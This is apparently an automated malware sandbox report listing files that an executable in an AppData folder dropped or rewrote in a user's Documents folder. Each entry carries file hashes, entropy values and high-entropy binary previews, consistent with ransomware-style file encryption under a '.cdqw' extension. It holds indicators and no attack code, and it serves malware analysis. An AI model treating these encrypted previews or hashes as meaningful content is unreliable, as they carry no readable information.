                                                                                                                                                  Preview:JDSOX..g.Y...p...K?zl.}tR......Q.k..4.N."...._F.@.........U.z]...".{..~......W..*N.XV....Hx.X."p......s(.E..t.R..l.....@J.X:.]...y..zlW%(..V.zH.W.......z.?.jt....z..#w.......5...K%D..r..i.$$.`..}..R. ..a.0.Q.)0....y....b.....#..<.J.?..!t.+.y:.k.^RC.~l..J...3.R......4.[..9m.......J...v%..yo]....D...!..O..i.~/.D.HS~..6....2..o*P...T..ruN..>S.Y..2......,(......W@>].Xz..\f..i...;...x.!K.,AkXy.$....K.s1...2.4~C.a....%&Q...9t;..1h.]..M.JC..5i..-_....a.~p.s.$4.$..g...f.+[....1#&........_...>......B...........2.....#R....B...P&.0.R.FDRK...m0K;......O.U".w...wjB`..V....RSw..1....Y!......u.dt.{...p.c.......6....K.....0*j..R.;.....L....a.(.K6....F..N....{.o..4..M..2.[Ln.....;G.n.0..M.jl.8'..{.4..)K^...j........HA....$+.....=.:... s..N3..t........V..Mk..6tQw...`..,$....j#.....rU.@e.9.n?.]^E|.9...4..M.C...cw2.B....r:.w....g..R.J.6.@JQ...0[@...d/.H.2\v.X!...+>..r........i$#a_...X.^.....2.aE!.G)..C.......R...N.:..sN....N..M..E.....OY-.....

                                                                                                                                                  C:\Users\user\Documents\JDSOXXXWOA.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.837231998886429
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:A4zov6eZlFZ3HZYKknGFohemzQmrIIYUm7lZR8hT9FgBHGDMG8DMTfH1bXKOaV2X:lzov6ebFjYOmdrIIYUU4hTDgBHGD3k63
                                                                                                                                                  MD5:02FDD6251016418F1056BD5DED1C5837
                                                                                                                                                  SHA1:FFFCF37DA68B215712D0DECEC4DDBDBC53BAF7E4
                                                                                                                                                  SHA-256:8A0A69C23C477CB91A5EB1DB01B7B97A6949C28F3CC61D65C97156DC0CC5438C
                                                                                                                                                  SHA-512:D6035183BD325B8B5FDD6B3BFABFDF708665B3B71688767DAAAB9C2421E27E8D16C188678B98C9B8D3BEB47E374F755DCE5C272138E91F57B4A5B8B7E53A509B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JDSOX..g.Y...p...K?zl.}tR......Q.k..4.N."...._F.@.........U.z]...".{..~......W..*N.XV....Hx.X."p......s(.E..t.R..l.....@J.X:.]...y..zlW%(..V.zH.W.......z.?.jt....z..#w.......5...K%D..r..i.$$.`..}..R. ..a.0.Q.)0....y....b.....#..<.J.?..!t.+.y:.k.^RC.~l..J...3.R......4.[..9m.......J...v%..yo]....D...!..O..i.~/.D.HS~..6....2..o*P...T..ruN..>S.Y..2......,(......W@>].Xz..\f..i...;...x.!K.,AkXy.$....K.s1...2.4~C.a....%&Q...9t;..1h.]..M.JC..5i..-_....a.~p.s.$4.$..g...f.+[....1#&........_...>......B...........2.....#R....B...P&.0.R.FDRK...m0K;......O.U".w...wjB`..V....RSw..1....Y!......u.dt.{...p.c.......6....K.....0*j..R.;.....L....a.(.K6....F..N....{.o..4..M..2.[Ln.....;G.n.0..M.jl.8'..{.4..)K^...j........HA....$+.....=.:... s..N3..t........V..Mk..6tQw...`..,$....j#.....rU.@e.9.n?.]^E|.9...4..M.C...cw2.B....r:.w....g..R.J.6.@JQ...0[@...d/.H.2\v.X!...+>..r........i$#a_...X.^.....2.aE!.G)..C.......R...N.:..sN....N..M..E.....OY-.....

                                                                                                                                                  C:\Users\user\Documents\JDSOXXXWOA.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.835065051791167
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:akMK6fWDek7N16BJn3D9h/Fn8ATgou8KOfgKgQOCw5uaOT35m7ZFkm5+2bD:DzT0BJ5hEo+HLjCTh1mFFDD
                                                                                                                                                  MD5:3B604CA148DF91B3400C8CEF5DE295AC
                                                                                                                                                  SHA1:74F5022C2D548CB86D99F80D006A89919BE2FE1C
                                                                                                                                                  SHA-256:DA819292F914531AB314BF9FD889775C8C16BC23FC7DCA3F67CF9A825B619BC0
                                                                                                                                                  SHA-512:9824A63E5E3CA8B235996EFCA60D62E5A6FC8685E1AF3825DB899F84B2E47C74A8F2E79E5C7562764ECCFB6B937340779B6668D3AE30FD7B9D8050BA7FE7F1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JDSOX.....S....Jb.Y.........Le.RS.b>l...... ....W.E...}......zRV{....Mk...t..u..I_...NA.r.....SsVjR:..`C..W.P.!m.@....a.#...3.5d.Fu...........@v4....t....j.k3x..:|..."....N.....r.p.f.(.j..(.~.K.H.8.&.cR....bNK4~.{.34......'>..G...47,...+.!.vT.}..W.+(q..#;y.*....2...e.4.....c.fh.)$.0.1...p....u0..[.p<H..-...:..Q?*..*..6HK......S...:.._....c.....P...i..aj.(..Xlf.@V.}:).(*3<.1.eyQ;..6.9.r.....6@.D#.lG.*.TKa.b.e`.%N5.(;.Q..=....?.oM.T.......tL........f....iD:..u...(.u...X.....%M..,..{.n|$.......'....6n..4...b...\...6].b.....[:{o.>.(/)Ns.....V.Xx.'c..RJ%'P#..k....,..&..ndo.......-....K...>_.I....X..8$.8:."Me....Og.....(d.Zj.M.Hq....*W1..].O..S...L..BG.s.9.S`.O......S..j.....H..I.6a........3[..1....z..N.1....t....gX.............2.$UN.....HP.....U..&.R....^.N,..&...0.P,....t.$.e4...L..:.k(.......u8;..~#.M.f.. R4.z.9"....!6Q.9....?.....n..";..S..`.i.Z...+..L.."..GW..:..[...-.....O<.1...$(~E.+9:....{..S....2A 6..2..;-....M.m.XY....9...{..Q.9....iI.

                                                                                                                                                  C:\Users\user\Documents\JDSOXXXWOA.pdf.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.835065051791167
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:akMK6fWDek7N16BJn3D9h/Fn8ATgou8KOfgKgQOCw5uaOT35m7ZFkm5+2bD:DzT0BJ5hEo+HLjCTh1mFFDD
                                                                                                                                                  MD5:3B604CA148DF91B3400C8CEF5DE295AC
                                                                                                                                                  SHA1:74F5022C2D548CB86D99F80D006A89919BE2FE1C
                                                                                                                                                  SHA-256:DA819292F914531AB314BF9FD889775C8C16BC23FC7DCA3F67CF9A825B619BC0
                                                                                                                                                  SHA-512:9824A63E5E3CA8B235996EFCA60D62E5A6FC8685E1AF3825DB899F84B2E47C74A8F2E79E5C7562764ECCFB6B937340779B6668D3AE30FD7B9D8050BA7FE7F1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JDSOX.....S....Jb.Y.........Le.RS.b>l...... ....W.E...}......zRV{....Mk...t..u..I_...NA.r.....SsVjR:..`C..W.P.!m.@....a.#...3.5d.Fu...........@v4....t....j.k3x..:|..."....N.....r.p.f.(.j..(.~.K.H.8.&.cR....bNK4~.{.34......'>..G...47,...+.!.vT.}..W.+(q..#;y.*....2...e.4.....c.fh.)$.0.1...p....u0..[.p<H..-...:..Q?*..*..6HK......S...:.._....c.....P...i..aj.(..Xlf.@V.}:).(*3<.1.eyQ;..6.9.r.....6@.D#.lG.*.TKa.b.e`.%N5.(;.Q..=....?.oM.T.......tL........f....iD:..u...(.u...X.....%M..,..{.n|$.......'....6n..4...b...\...6].b.....[:{o.>.(/)Ns.....V.Xx.'c..RJ%'P#..k....,..&..ndo.......-....K...>_.I....X..8$.8:."Me....Og.....(d.Zj.M.Hq....*W1..].O..S...L..BG.s.9.S`.O......S..j.....H..I.6a........3[..1....z..N.1....t....gX.............2.$UN.....HP.....U..&.R....^.N,..&...0.P,....t.$.e4...L..:.k(.......u8;..~#.M.f.. R4.z.9"....!6Q.9....?.....n..";..S..`.i.Z...+..L.."..GW..:..[...-.....O<.1...$(~E.+9:....{..S....2A 6..2..;-....M.m.XY....9...{..Q.9....iI.

                                                                                                                                                  C:\Users\user\Documents\JDSOXXXWOA\MNULNCRIYC.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.873861061175349
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:h91uZmAYQNMe1nznLHU1o6pHFrYt5J+iMGJVMqW82lT2bD:RuZmAYQDznLHmNFrkDtJHRD
                                                                                                                                                  MD5:7A1D81A56FAFD8125B9F16F6E1A55D51
                                                                                                                                                  SHA1:6596CE249A8BCF26467375A16B061DBB116B585E
                                                                                                                                                  SHA-256:796EE1A97C4FD39C9B39030E301D6EF097156ECDB631AB976166BB1E558D3AEA
                                                                                                                                                  SHA-512:E0FCA3AD512939F151764854A07E4B8E340E2A6BE3F22ABC634E391ABCE843942C30AF1FB83EDDFE9C465C927C76D573BA2ABEF6EE866EC87F89372F7C706E46
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MNULNk?..N.jz.......K......Zk%;j...|..Y8...%.Vy(....}.!..>'.c.c.."...l..N...n.jPg.............hh..(....Wo{...xy4....<tz.(Or1.r.iJ.o....y...U...fL.{.}B|....pG..eq..N=2.[....g.I.>gM|.*......B....E.ygR...a1...br..2.'.A].z.U.y..I.7T...E.|+;.I....&..^."......5YP..|r.G...F.X.0~..N)....l.vcJ.........R....{.\.v.OD..Ww..P.......@q........n_.!.5..6.M...6.y.......2a.......X......a.$./..B..D.'....F...A).S...'....ms5..)../..7...f..u.....[34..N.....j...R..?4z..z.u...Y".y..*T-.Q....7nb.......9t..+.M.#...8.e..}.g%.e..3.D...q..a..D..s@Iq.......r.TW.J[<|.S^..g..qu.....u.u..[3..b..,..~i.^....(.jcI:|....+...vh&...:3.'L..f...K"2.f..-.sl..8.N.....&.<i..........k....92..w.9....=.>*.....GB.......{t..@glM..b..8>..j.5..[..`.z+X....xh.#...wd. .@.[......q1.W|.v.......R(z...&..]|..1.d.n.......6~0m.p..(T.-.....YT.W]/.t.....%...m]Tv.E..E.....X>...'.j.V2.._Q........$. ...U^Z..4%.7..c.S.. o.`..M..Z<..MY&^...9.z..G...pH...S.G..HP0=y..U.\..M]..%.e...y..gB5/.}FU

                                                                                                                                                  C:\Users\user\Documents\JDSOXXXWOA\MNULNCRIYC.png.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.873861061175349
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:h91uZmAYQNMe1nznLHU1o6pHFrYt5J+iMGJVMqW82lT2bD:RuZmAYQDznLHmNFrkDtJHRD
                                                                                                                                                  MD5:7A1D81A56FAFD8125B9F16F6E1A55D51
                                                                                                                                                  SHA1:6596CE249A8BCF26467375A16B061DBB116B585E
                                                                                                                                                  SHA-256:796EE1A97C4FD39C9B39030E301D6EF097156ECDB631AB976166BB1E558D3AEA
                                                                                                                                                  SHA-512:E0FCA3AD512939F151764854A07E4B8E340E2A6BE3F22ABC634E391ABCE843942C30AF1FB83EDDFE9C465C927C76D573BA2ABEF6EE866EC87F89372F7C706E46
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MNULNk?..N.jz.......K......Zk%;j...|..Y8...%.Vy(....}.!..>'.c.c.."...l..N...n.jPg.............hh..(....Wo{...xy4....<tz.(Or1.r.iJ.o....y...U...fL.{.}B|....pG..eq..N=2.[....g.I.>gM|.*......B....E.ygR...a1...br..2.'.A].z.U.y..I.7T...E.|+;.I....&..^."......5YP..|r.G...F.X.0~..N)....l.vcJ.........R....{.\.v.OD..Ww..P.......@q........n_.!.5..6.M...6.y.......2a.......X......a.$./..B..D.'....F...A).S...'....ms5..)../..7...f..u.....[34..N.....j...R..?4z..z.u...Y".y..*T-.Q....7nb.......9t..+.M.#...8.e..}.g%.e..3.D...q..a..D..s@Iq.......r.TW.J[<|.S^..g..qu.....u.u..[3..b..,..~i.^....(.jcI:|....+...vh&...:3.'L..f...K"2.f..-.sl..8.N.....&.<i..........k....92..w.9....=.>*.....GB.......{t..@glM..b..8>..j.5..[..`.z+X....xh.#...wd. .@.[......q1.W|.v.......R(z...&..]|..1.d.n.......6~0m.p..(T.-.....YT.W]/.t.....%...m]Tv.E..E.....X>...'.j.V2.._Q........$. ...U^Z..4%.7..c.S.. o.`..M..Z<..MY&^...9.z..G...pH...S.G..HP0=y..U.\..M]..%.e...y..gB5/.}FU

                                                                                                                                                  C:\Users\user\Documents\JDSOXXXWOA\QVTVNIBKSD.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.854823790291729
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:zTYBq/TopFT05wnge/4OM+Zgav3Iugk7EbA6clCNrlobzSV2bD:zMBqTGn14O/7P2AzSuD
                                                                                                                                                  MD5:BBCFC7427C79479C7D2B607F3CCA87C3
                                                                                                                                                  SHA1:A79C2C9DD5E7D48B7FA3CF58F72D41A52EAEA58E
                                                                                                                                                  SHA-256:CA65D2BFFB76240202BD7FA0162A4CC6C6A4DE00BD7B8CC81A65AD40E5318B60
                                                                                                                                                  SHA-512:404711FB20953F0683FAE7258F45A7FE04527E36C323850434B8EECE1E4CAF8108D5CB9D8D2365007EE49C409CB1277F9A4CA3C44AEFDD60CB3728711EC17A4E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVN..../..E*.t.._c..}j..F.:!......;.L...e..LVD..8.f-.{.:...;.l..]...............1..GF...t.<..P=.vM..\..g|%%Z..F.|.|&.[I.S...'.<.I5....Y..+..#.1.b...`.3.....lN..........2.1.K..z.......0.1XH#~...&.S.h...h..{<.2...C.[........R:..^.J.~..S....:n&.P.2h....(.K..'.F..2..........:.....t.&..,g..n.[:rV..c....3...u5....'........3&..x......w ...b.../."...tvMO#...|p...v...j.S.3.........{.!..`9..<....n.U..ll........,...t./..<I?.[... .E..5.B.Z$...4..d.....;.s.I;_..Yb..h...>[K...G[4",..@.hVj..R..Y......n.O.GGD..6....e.jD.~a..z*w.-......^..K....jJ...3......bN..p..E.,....=y..u.v/.$z..X.NU...!...1\L.%....*...Yk.^w.u../9V.N.. .q...b.`....o.b...0ZKc..P.s.....f^..uP...~(.mZ...... .[...z....T........5...q*..@.@....x&w..4X9....^h......^........N)v....Qn..i.M..g..6.|......La."..V..-..s..7.t.AP7.,K.7.4..R..0.6.@...EKe.^.......HM..?w.V.....*T...n..I.......2C.=..Q}..i....-{Ui....`}<....u.:z.....5w......iYaj.-.....*.[~@...T.....3.........%.......k^....

                                                                                                                                                  C:\Users\user\Documents\JDSOXXXWOA\QVTVNIBKSD.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.854823790291729
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:zTYBq/TopFT05wnge/4OM+Zgav3Iugk7EbA6clCNrlobzSV2bD:zMBqTGn14O/7P2AzSuD
                                                                                                                                                  MD5:BBCFC7427C79479C7D2B607F3CCA87C3
                                                                                                                                                  SHA1:A79C2C9DD5E7D48B7FA3CF58F72D41A52EAEA58E
                                                                                                                                                  SHA-256:CA65D2BFFB76240202BD7FA0162A4CC6C6A4DE00BD7B8CC81A65AD40E5318B60
                                                                                                                                                  SHA-512:404711FB20953F0683FAE7258F45A7FE04527E36C323850434B8EECE1E4CAF8108D5CB9D8D2365007EE49C409CB1277F9A4CA3C44AEFDD60CB3728711EC17A4E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVN..../..E*.t.._c..}j..F.:!......;.L...e..LVD..8.f-.{.:...;.l..]...............1..GF...t.<..P=.vM..\..g|%%Z..F.|.|&.[I.S...'.<.I5....Y..+..#.1.b...`.3.....lN..........2.1.K..z.......0.1XH#~...&.S.h...h..{<.2...C.[........R:..^.J.~..S....:n&.P.2h....(.K..'.F..2..........:.....t.&..,g..n.[:rV..c....3...u5....'........3&..x......w ...b.../."...tvMO#...|p...v...j.S.3.........{.!..`9..<....n.U..ll........,...t./..<I?.[... .E..5.B.Z$...4..d.....;.s.I;_..Yb..h...>[K...G[4",..@.hVj..R..Y......n.O.GGD..6....e.jD.~a..z*w.-......^..K....jJ...3......bN..p..E.,....=y..u.v/.$z..X.NU...!...1\L.%....*...Yk.^w.u../9V.N.. .q...b.`....o.b...0ZKc..P.s.....f^..uP...~(.mZ...... .[...z....T........5...q*..@.@....x&w..4X9....^h......^........N)v....Qn..i.M..g..6.|......La."..V..-..s..7.t.AP7.,K.7.4..R..0.6.@...EKe.^.......HM..?w.V.....*T...n..I.......2C.=..Q}..i....-{Ui....`}<....u.:z.....5w......iYaj.-.....*.[~@...T.....3.........%.......k^....

                                                                                                                                                  C:\Users\user\Documents\JPEAFKFPZY.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.858657633663488
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ZTDad4n559AVnrXMAzo5Ty4g6qPyXgcOXjBKJ4bioJKNb9z4erFtplr2bD:t2sGn7MAzwTQ6TXgcOTBKJ4bioJib1yD
                                                                                                                                                  MD5:3EAE472F8E7DA590AF81E32BD5247C7E
                                                                                                                                                  SHA1:C6A7714BAA6DE822D4F2B8932DC01978B1ED4893
                                                                                                                                                  SHA-256:376A800FC18E4F720871C47F8A680BA96CD7403F557BF4FBFE85909E2AF6B079
                                                                                                                                                  SHA-512:BF7EA9AEE2EF5B7F94B49B37350B8839E8860262EEB677B9B43698CCEAEB50FC36A23F01D6009E590470769C5970760FEA6E37967A2463EC50F7F5D921D86FE0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JPEAFR..\..q*..r[......3.7Gf...3..q....W....+.$v:.G .#.$G^.......A....[j~U.....I*.R...J.$X.G...g..v.b.....#B.ZH...{.[3d<.|.R..a...]....6Q.......K].V.q....g.\I..[r9......Z'..._e...Ou.....KKB)..'....7\9]q...A.g?....,..sE..r..=.e.....6..`?3.C.&hK.c..5....I.V....~q>...syR.....H.......j...?-...J.A.{..3.....%Ff.:.Iz....e......l..7..z....Zu.......u$..\.m....[.#...&(.-........'".#..*2......Y.|K.Z(5b.N..F.6I..Y`......T..ftv.^O..ln...r.6..>3....e..b,;zu$.FJ.r.z]..m.......n.!........g.5.......n9. d.......QP.r....L....dn?Xv9Zp.....H...N>W/.t.'..R.E@).Ay(.V"....2.g.r.4<...<^..Hrj%.._&..;I"....-.0.7.S..........~>D....f.8.G`..l...}.....|%pf'.R+?-...:s..P._.4Tz{.t.m_r.....'f...........\.qw..o..O....k.[..;k......|.........].3.......S..-.....M.....E..nU.......6..3-.d..N.l.>*./.7........:h.zx.r.Ie.w.AOy...@.r5.HS.x..;v..8.j..v..4...d....P....B.*..l.....Mr...i=..V.P.VP..:J...1$G.Zt.#i.2..\.'~...f..*.K....S..E.Zm.W.b..HA....!...........X.Lfp.T

                                                                                                                                                  C:\Users\user\Documents\JPEAFKFPZY.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.858657633663488
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ZTDad4n559AVnrXMAzo5Ty4g6qPyXgcOXjBKJ4bioJKNb9z4erFtplr2bD:t2sGn7MAzwTQ6TXgcOTBKJ4bioJib1yD
                                                                                                                                                  MD5:3EAE472F8E7DA590AF81E32BD5247C7E
                                                                                                                                                  SHA1:C6A7714BAA6DE822D4F2B8932DC01978B1ED4893
                                                                                                                                                  SHA-256:376A800FC18E4F720871C47F8A680BA96CD7403F557BF4FBFE85909E2AF6B079
                                                                                                                                                  SHA-512:BF7EA9AEE2EF5B7F94B49B37350B8839E8860262EEB677B9B43698CCEAEB50FC36A23F01D6009E590470769C5970760FEA6E37967A2463EC50F7F5D921D86FE0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JPEAFR..\..q*..r[......3.7Gf...3..q....W....+.$v:.G .#.$G^.......A....[j~U.....I*.R...J.$X.G...g..v.b.....#B.ZH...{.[3d<.|.R..a...]....6Q.......K].V.q....g.\I..[r9......Z'..._e...Ou.....KKB)..'....7\9]q...A.g?....,..sE..r..=.e.....6..`?3.C.&hK.c..5....I.V....~q>...syR.....H.......j...?-...J.A.{..3.....%Ff.:.Iz....e......l..7..z....Zu.......u$..\.m....[.#...&(.-........'".#..*2......Y.|K.Z(5b.N..F.6I..Y`......T..ftv.^O..ln...r.6..>3....e..b,;zu$.FJ.r.z]..m.......n.!........g.5.......n9. d.......QP.r....L....dn?Xv9Zp.....H...N>W/.t.'..R.E@).Ay(.V"....2.g.r.4<...<^..Hrj%.._&..;I"....-.0.7.S..........~>D....f.8.G`..l...}.....|%pf'.R+?-...:s..P._.4Tz{.t.m_r.....'f...........\.qw..o..O....k.[..;k......|.........].3.......S..-.....M.....E..nU.......6..3-.d..N.l.>*./.7........:h.zx.r.Ie.w.AOy...@.r5.HS.x..;v..8.j..v..4...d....P....B.*..l.....Mr...i=..V.P.VP..:J...1$G.Zt.#i.2..\.'~...f..*.K....S..E.Zm.W.b..HA....!...........X.Lfp.T

                                                                                                                                                  C:\Users\user\Documents\JPEAFKFPZY\IVHSHTCODI.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.831927770353075
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:b4t3utwbFIaLUYKi3wRUCZkH/0I5+fcBjKpWB+g//jGbaDh5peJ5/Lm5I0x1X2bD:ttwbzFKwgQ/SfcBjKpWB+k/j+u9MtLmM
                                                                                                                                                  MD5:3F1DC37401B1F415AEF9F574D7CAF806
                                                                                                                                                  SHA1:14BA96F552E92033E97F138DDB8F418BBD8A8834
                                                                                                                                                  SHA-256:34D75B465974C37AE48A827571232A44FC4ABD488D87712A7A6A6D2F55E86851
                                                                                                                                                  SHA-512:50191C4DB39F0A78FFD6D140064217D8E7C2B827A82E4C7452785B67108703027D20B496DA39AF575DF906573EBD9E440DAC7645178E34FA9054E28EE398953D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:IVHSHO..+........a?t.....I:>.......\....g1U..J`c..q...<....^B.B..,...<...j......RJe.%.>...rC......H..a\.:'.X....s.8.>L.:...RJ.%...E4V.P...X@.O.=.z.A=.......+.p.`K.J.Q.E.......C.I.t.M..zeb.......}...r.l.3.0..K....g.$.B.].cD9.PFb2?.....a...SZ.-B............D<!...L.../7Y....M"Z..JDu.B._...7GG...a.....@...[...:.*%.I.MH...n9\..K..>.....H...Z..+.k._..%!.......q.}...............V..3..>.s..Aqa.&...1.9.0...-V...z@...,...l.....).d..y...&.)j'...4..}.;..KD...9.j(3+.%..=3.).N.t.........8.f..3.Z...a...6.x..m...C.g>....%.....{.("\J.F....OSM:.........M..:b......KX..R..OM........F3"!79....g...7...._c..1.x>.....}7z..x......../..x...^.....a.....Aa.T/.{....,S.....(_qG..[?9g....x'.........!0q.1.J.P)...X?)....s47D.Ync...._!-.0...j.#-"3.,.........S.\...u<y...P..a&&b...cs..<3.1..P.1..]".zU...~....%9Y+:.4..=.G.....KA.4.h...w.U..../...T.=t.?......|i.h.ax..5.........r.1..=.>7.....b_@....Ffj.Ky..?....q1..4+. &.FI.W7........Y..&U.{-_p"[.....HY%..%....W.G...1.

                                                                                                                                                  C:\Users\user\Documents\JPEAFKFPZY\IVHSHTCODI.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.831927770353075
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:b4t3utwbFIaLUYKi3wRUCZkH/0I5+fcBjKpWB+g//jGbaDh5peJ5/Lm5I0x1X2bD:ttwbzFKwgQ/SfcBjKpWB+k/j+u9MtLmM
                                                                                                                                                  MD5:3F1DC37401B1F415AEF9F574D7CAF806
                                                                                                                                                  SHA1:14BA96F552E92033E97F138DDB8F418BBD8A8834
                                                                                                                                                  SHA-256:34D75B465974C37AE48A827571232A44FC4ABD488D87712A7A6A6D2F55E86851
                                                                                                                                                  SHA-512:50191C4DB39F0A78FFD6D140064217D8E7C2B827A82E4C7452785B67108703027D20B496DA39AF575DF906573EBD9E440DAC7645178E34FA9054E28EE398953D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:IVHSHO..+........a?t.....I:>.......\....g1U..J`c..q...<....^B.B..,...<...j......RJe.%.>...rC......H..a\.:'.X....s.8.>L.:...RJ.%...E4V.P...X@.O.=.z.A=.......+.p.`K.J.Q.E.......C.I.t.M..zeb.......}...r.l.3.0..K....g.$.B.].cD9.PFb2?.....a...SZ.-B............D<!...L.../7Y....M"Z..JDu.B._...7GG...a.....@...[...:.*%.I.MH...n9\..K..>.....H...Z..+.k._..%!.......q.}...............V..3..>.s..Aqa.&...1.9.0...-V...z@...,...l.....).d..y...&.)j'...4..}.;..KD...9.j(3+.%..=3.).N.t.........8.f..3.Z...a...6.x..m...C.g>....%.....{.("\J.F....OSM:.........M..:b......KX..R..OM........F3"!79....g...7...._c..1.x>.....}7z..x......../..x...^.....a.....Aa.T/.{....,S.....(_qG..[?9g....x'.........!0q.1.J.P)...X?)....s47D.Ync...._!-.0...j.#-"3.,.........S.\...u<y...P..a&&b...cs..<3.1..P.1..]".zU...~....%9Y+:.4..=.G.....KA.4.h...w.U..../...T.=t.?......|i.h.ax..5.........r.1..=.>7.....b_@....Ffj.Ky..?....q1..4+. &.FI.W7........Y..&U.{-_p"[.....HY%..%....W.G...1.

                                                                                                                                                  C:\Users\user\Documents\JPEAFKFPZY\JPEAFKFPZY.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.855808543347058
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:pfb6YzfHCDhg1WYfhpiTFqmEIcSIxgAiC+Cj2weoRysgiMtFilVaV2bD:puY7HCFAZeAIc9xgJC9QoRyriMtF8VbD
                                                                                                                                                  MD5:A5ECF1C1EFE01946B0D9B664E53C986D
                                                                                                                                                  SHA1:93B28461DA74C6ABA222750E376494F591CED70D
                                                                                                                                                  SHA-256:23E6D06DB423EC77158054F1D5EC8DE34F46E5A776E76212BB5B5C47DE0AE9E4
                                                                                                                                                  SHA-512:F0DA5A650527BB0A80A9F282D3B8E057CE7840E50F26367A7B377FD3C3E116B363C0DFFD224E9787C8CA9AA4B1B67C6B6DB27BB7C31C7CD6F487A80489ABF707
                                                                                                                                                  Malicious:false
